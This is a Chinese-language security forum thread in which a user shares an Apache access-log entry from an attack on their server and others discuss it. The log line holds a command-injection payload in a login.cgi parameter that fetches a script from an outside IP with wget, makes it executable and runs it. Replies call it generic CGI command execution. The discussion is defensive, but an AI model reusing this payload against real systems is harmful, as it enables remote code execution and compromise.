我被攻击了 扫描 xss web应用漏洞利用
apache的异常日志
匿名用户 2018-08-12 21:45:49 1421人浏览

apache的访问日志:

41.45.160.90 - - [12/Aug/2018:09:24:10 -0400] "GET /login.cgi?cli=aa%20aa%27;wget%20http://212.237.32.62/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 0 "-" "LMAO/2.0"


试着从212.237.32.62下载看看有什么,然而什么都找不到

ip地址(2) 威胁情报数目 开放端口 所属域名 相关样本 微步标签 < 1/1 >
匿名用户 2018-09-12 18:06:57 回复
这种我也遇到很多,就是一个shell脚本再下载一些样本
穿越蓝天 2018-08-20 13:21:59 回复
哥们,状态码是400,不用愁
pumaxy 2018-08-18 11:17:49 回复
用sh执行的,直接打开就行,shell脚本,估计是提权用的
匿名用户 2018-08-13 20:02:11 回复
已经下线了 我看了一眼
匿名用户 2018-08-12 23:20:57 回复
应该是一个通用的cgi 命令执行吧
匿名用户 2018-08-12 23:20:45 回复
0day吗??
奖励计划banner
今日推荐